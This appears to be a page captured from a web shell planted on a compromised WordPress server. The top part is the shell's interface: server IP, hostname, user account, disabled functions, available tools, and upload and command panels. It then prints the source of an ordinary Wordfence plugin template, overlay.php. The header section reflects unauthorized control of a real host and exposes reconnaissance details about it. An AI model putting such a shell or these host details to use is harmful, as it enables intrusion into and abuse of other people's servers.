403Webshell
Server IP : 116.202.121.150  /  Your IP : 216.73.216.20
Web Server : Apache
System : Linux server5.febas.net 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
User : k9887-1 ( 1171)
PHP Version : 8.2.33
Disable Function : show_source, highlight_file, apache_child_terminate, apache_get_modules, apache_note, apache_setenv, virtual, dl, posix_getpwnam, posix_getpwuid, posix_mkfifo, posix_mknod, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_nice, openlog, syslog, pfsockopen, system, shell_exec, passthru, popen, proc_open, exec
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/k9887-1/htdocs/_fisch/wp-content/plugins/wordfence/views/onboarding/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/k9887-1/htdocs/_fisch/wp-content/plugins/wordfence/views/onboarding/overlay.php
<?php
if (!defined('WORDFENCE_VERSION')) { exit; }
/**
 * Presents the overlay.
 *
 * Expects $contentHTML to be defined.
 *
 * @var string $contentHTML The HTML content to show on the overlay.
 */
?>
<div id="wf-onboarding-plugin-overlay">
	<a href="#" id="wf-onboarding-dismiss" role="button">&times;</a>
	<?php echo $contentHTML; ?>
	<script type="application/javascript">
		(function($) {
			$(function() {
				$('#wf-onboarding-dismiss, #wf-onboarding-plugin-overlay').on('click', function(e) {
					e.preventDefault();
					e.stopPropagation();
					
					$(window).trigger('wfOnboardingDismiss');
					$('#wf-onboarding-plugin-overlay').fadeOut(400, function() {
						$('#wf-onboarding-plugin-overlay').remove();
					});
				});

				$(document).keyup(function(e) {
					if (e.keyCode == 27) { //esc
						$('#wf-onboarding-dismiss').trigger('click');
					}
				});
			});
		})(jQuery);
	</script>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit